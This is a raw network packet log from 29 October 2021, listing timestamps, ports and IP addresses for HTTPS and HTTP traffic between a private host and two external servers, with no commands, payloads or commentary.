Oct 29, 2021 20:50:12.963924885 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:12.964459896 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:13.022105932 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:13.784934998 CEST	49842	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:13.837189913 CEST	80	49842	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:13.837337971 CEST	49842	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:13.837456942 CEST	49842	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:13.837476969 CEST	49842	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:13.889619112 CEST	80	49842	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:13.913882971 CEST	80	49842	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:13.914058924 CEST	49842	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:13.914392948 CEST	49842	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:13.966435909 CEST	80	49842	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:14.042093039 CEST	49843	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.096924067 CEST	80	49843	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:14.097052097 CEST	49843	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.097301960 CEST	49843	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.097315073 CEST	49843	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.150785923 CEST	80	49843	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:14.177367926 CEST	80	49843	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:14.177529097 CEST	49843	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.177786112 CEST	49843	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.230038881 CEST	80	49843	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:14.250879049 CEST	49844	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.302654028 CEST	80	49844	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:14.302758932 CEST	49844	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.302923918 CEST	49844	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.302942991 CEST	49844	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.386461020 CEST	80	49844	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:14.386596918 CEST	49844	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.401253939 CEST	49844	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.452923059 CEST	80	49844	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:14.501084089 CEST	49845	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.553491116 CEST	80	49845	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:14.553664923 CEST	49845	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.553982019 CEST	49845	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.554013968 CEST	49845	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.637828112 CEST	80	49845	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:14.638062000 CEST	49845	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.638401031 CEST	49845	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.690716982 CEST	80	49845	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:14.752506971 CEST	49846	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.805588007 CEST	80	49846	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:14.805728912 CEST	49846	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.805903912 CEST	49846	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.805927992 CEST	49846	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.886051893 CEST	80	49846	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:14.886246920 CEST	49846	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.941858053 CEST	49846	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:14.994931936 CEST	80	49846	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:15.445910931 CEST	49847	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:15.499501944 CEST	80	49847	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:15.499706030 CEST	49847	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:15.499891996 CEST	49847	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:15.499919891 CEST	49847	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:15.582477093 CEST	80	49847	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:15.582674980 CEST	49847	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:15.582907915 CEST	49847	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:15.637046099 CEST	80	49847	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:15.723134041 CEST	49848	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:15.775854111 CEST	80	49848	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:15.776088953 CEST	49848	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:15.778964043 CEST	49848	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:15.779009104 CEST	49848	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:15.831145048 CEST	80	49848	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:15.858735085 CEST	80	49848	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:15.858866930 CEST	49848	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:15.859050989 CEST	49848	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:15.911114931 CEST	80	49848	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:16.383764982 CEST	49849	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:16.437613964 CEST	80	49849	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:16.437865973 CEST	49849	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:16.521620035 CEST	49849	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:16.521656990 CEST	49849	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:16.600121021 CEST	80	49849	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:16.600311041 CEST	49849	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:16.601118088 CEST	49849	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:16.654823065 CEST	80	49849	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:16.851274967 CEST	49850	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:16.903474092 CEST	80	49850	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:16.903563023 CEST	49850	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:16.904588938 CEST	49850	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:16.904608011 CEST	49850	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:16.908066988 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.946029902 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.946198940 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.946279049 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.946296930 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.946316004 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.946363926 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.946372032 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.946424961 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.946475029 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.946482897 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.946527004 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.946578026 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.946580887 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.946628094 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.946688890 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.946696043 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.946739912 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.946753025 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.946758032 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.946803093 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.946808100 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.946820021 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.946861982 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.946867943 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.946919918 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.946958065 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.946964979 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.946971893 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947012901 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.947017908 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947072029 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947110891 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.947113037 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947127104 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947170973 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.947177887 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947232962 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947268963 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.947273970 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947288036 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947326899 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.947339058 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947407007 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947441101 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.947448969 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947493076 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947526932 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.947534084 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947573900 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947617054 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947618961 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.947628975 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947670937 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.947678089 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947730064 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947767973 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.947771072 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947782993 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947823048 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.947832108 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947881937 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947930098 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.947937965 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.947972059 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.963402033 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.963593960 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.963823080 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.963896990 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.963901043 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.963913918 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.963952065 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.963973999 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.964025021 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.964040041 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.964095116 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.964123964 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.964132071 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.964140892 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.964171886 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.964354038 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.964428902 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.964458942 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.964513063 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.964531898 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.964584112 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.964593887 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.964646101 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.964648008 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.964662075 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.964694977 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.980412960 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.980488062 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.980546951 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.980564117 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.980580091 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.980601072 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.980609894 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.980631113 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.980637074 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.980652094 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.980680943 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.980688095 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.980715036 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.980734110 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.981518984 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.981647015 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.981656075 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:16.981702089 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:16.985292912 CEST	80	49850	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:16.985471964 CEST	49850	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:17.192867041 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:17.193042040 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:17.636872053 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:17.637058020 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.001229048 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.001259089 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.001338005 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.001869917 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.001883030 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.001897097 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.001959085 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.001966953 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.001976967 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.001981974 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.002057076 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.002068996 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.002079010 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.002149105 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.014436007 CEST	49850	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.066458941 CEST	80	49850	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:18.067529917 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.067555904 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.067639112 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.067832947 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.067836046 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.067847967 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.067854881 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.067912102 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.067915916 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.067923069 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.067995071 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.068002939 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.068011045 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.068085909 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.072292089 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.072313070 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.072423935 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.072705030 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.072714090 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.072724104 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.072808981 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.072814941 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.072824001 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.072880030 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.072886944 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.072926998 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.072972059 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.076329947 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.076356888 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.076481104 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.076987028 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.076998949 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.077013016 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.077023029 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.077131987 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.077148914 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.077169895 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.077227116 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.077274084 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.090327024 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.090362072 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.090471029 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.090995073 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.091011047 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.091027021 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.091032028 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.091121912 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.091128111 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.091137886 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.091173887 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.091252089 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.093035936 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.093049049 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.093143940 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.093314886 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.093318939 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.093329906 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.093334913 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.093411922 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.093419075 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.093430996 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.093461037 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.093512058 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.094569921 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.094590902 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.094664097 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.095022917 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.095036983 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.095056057 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.095061064 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.095143080 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.095158100 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.095175028 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.095240116 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.096350908 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.096366882 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.096447945 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.096812963 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.096820116 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.096836090 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.096839905 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.096921921 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.096929073 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.096988916 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.097069979 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.098154068 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.098161936 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.098265886 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.098428011 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.098440886 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.098458052 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.098467112 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.098545074 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.098553896 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.098617077 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.099828959 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.099843025 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.099925995 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.100086927 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.100091934 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.100106001 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.100115061 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.100188017 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.100194931 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.100241899 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.119729042 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.119761944 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.119924068 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.120081902 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.120094061 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.120109081 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.120116949 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.120203972 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.120209932 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.120335102 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.121470928 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.121489048 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.121612072 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.121987104 CEST	49841	443	192.168.2.4	162.159.129.233
